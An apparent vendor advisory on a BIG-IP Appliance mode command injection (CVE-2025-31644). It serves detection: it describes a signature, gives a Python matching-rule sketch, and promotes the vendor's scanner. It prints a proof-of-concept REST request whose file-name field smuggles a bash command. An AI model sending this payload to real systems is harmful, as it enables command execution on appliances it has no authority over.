F5 BIG-IP Appliance Mode Command Injection (CVE-2025-31644)
- Dee Sehejpal BSc (HONS)
- May 23

Application Details
BIG-IP is a collection of hardware platforms and software solutions which provide numerous services solely focused on security, reliability, and performance.
Vulnerability
A command injection vulnerability exists in an undisclosed iControl REST and BIG-IP TMOS Shell (tmsh) command when Appliance mode is activated.
Identification
This command could potentially allow an authenticated attacker, with administrator role privileges, to execute arbitrary system commands. A successful exploit could allow the attacker to cross a security boundary.
POST /mgmt/tm/sys/config
{
"command":"save",
"options": [
{"file":"/var/tmp/`bash'${IFS}-c${IFS}'id'|'tee'${IFS}-a${IFS}'mal_was_here`.scf", "passphrase":"aaaa"}
]
}
Detection
By turning this into a traffic file and matching rule, we are able to detect attempts to execute arbitrary commands on the system.
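The kind of matching rule described above can be sketched as follows. This is an added example, not Idappcom's signature 8025967 or code from the original post. The function name and the set of shell metacharacters are assumptions, and the sample requests are constructed.

```python
import json
import re

# Path taken from the request shown on the page.
TARGET_PATH = "/mgmt/tm/sys/config"
# Assumption: shell syntax that a legitimate saved-config file name
# has no reason to contain.
SHELL_META = re.compile(r"[`|;&<>\n]|\$\(|\$\{")


def suspicious_save_request(method, path, body):
    """Return the 'file' option values that carry shell syntax.

    An empty list means the request does not match the rule.
    """
    if method.upper() != "POST":
        return []
    if path.split("?", 1)[0].rstrip("/") != TARGET_PATH:
        return []
    try:
        # Parsing first means JSON escapes such as \u0060 are decoded
        # before matching, which a regex over the raw body would miss.
        doc = json.loads(body)
    except (ValueError, TypeError):
        return []
    if not isinstance(doc, dict) or doc.get("command") != "save":
        return []
    options = doc.get("options")
    if not isinstance(options, list):
        return []
    hits = []
    for opt in options:
        if isinstance(opt, dict):
            value = opt.get("file")
            if isinstance(value, str) and SHELL_META.search(value):
                hits.append(value)
    return hits


# Constructed sample bodies (not captured traffic).
BENIGN = json.dumps({"command": "save", "options": [
    {"file": "/var/tmp/backup.scf", "passphrase": "x"}]})
FLAGGED = json.dumps({"command": "save", "options": [
    {"file": "/var/tmp/`id`.scf", "passphrase": "x"}]})

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("flagged", FLAGGED)):
        print(name, suspicious_save_request("POST", TARGET_PATH, body))
```

The rule only sees decrypted traffic, so it belongs behind TLS termination or in management-plane request logging.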
Coverage
Idappcom have created signature 8025967 along with a traffic file for this vulnerability.
Traffic IQ
If you are concerned that your business may be at risk from this vulnerability or others, why not try out our Traffic IQ software, which can scan your defences and report any issues? Learn more here: https://www.idappcom.co.uk/traffic-iq-professional